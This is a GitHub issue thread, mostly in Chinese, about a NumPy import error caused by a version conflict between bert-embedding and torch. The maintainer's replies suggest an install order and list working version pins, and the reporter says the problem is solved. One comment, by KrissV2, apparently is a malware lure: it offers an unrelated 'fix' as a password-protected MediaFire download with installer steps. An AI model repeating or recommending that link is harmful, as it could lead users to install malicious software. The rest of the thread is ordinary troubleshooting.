### ISSUE TITLE
No module named 'numpy.core._multiarray_umath

### ISSUE THREAD

**Issue by yyyxcleo** [haihuangcode/CMG#12]
您好，我在配置环境种遇到了问题，bert-embedding库要求numpy版本只能为1.14.6，但是安装numpy以后，报错 Failed to initialize NumPy: No module named 'numpy.core._multiarray_umath' ，该怎么解决呢

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by haihuangcode** [comment]
你好，请问你现在解决问题了吗？你遇到的这个问题我没遇到过，我在网上查找有类似的问题，里面的解决方案不知道能不能帮你解决：https://blog.csdn.net/czyxiaowu/article/details/132611147
如果你还有别的问题，欢迎随时回复我。

**Comment by yyyxcleo** [comment]
还没有，想请问一下，torch需要安装版本是多少的呢？我一开始按requirements.txt里装的torch的版本，numpy默认装的是1.21，然后我把numpy卸掉重新装1.14版本的就报错了

**Comment by yyyxcleo** [comment]
> 你好，请问你现在解决问题了吗？你遇到的这个问题我没遇到过，我在网上查找有类似的问题，里面的解决方案不知道能不能帮你解决：https://blog.csdn.net/czyxiaowu/article/details/132611147 如果你还有别的问题，欢迎随时回复我。

这个我试过，但是numpy upgrade的话就与bert-embedding要求的numpy版本不兼容了

**Comment by haihuangcode** [comment]
bert-embedding这个确实有点麻烦，我印象里有试过先安装好bert-embedding，然后再安装别的库，哪怕后面numpy版本变了程序也是可以正常运行的。(或者你先安装torch相关的以及别的库，最后再安装bert-embedding，也可能是这种方式）
我现在可以运行CMG的环境是这样的：
torch==1.13.1
torchaudio==0.13.1
torchvision==0.14.0
numpy==1.21.6
bert-embedding==1.0.1

**Comment by yyyxcleo** [comment]
已经可以了，感谢您的回复！
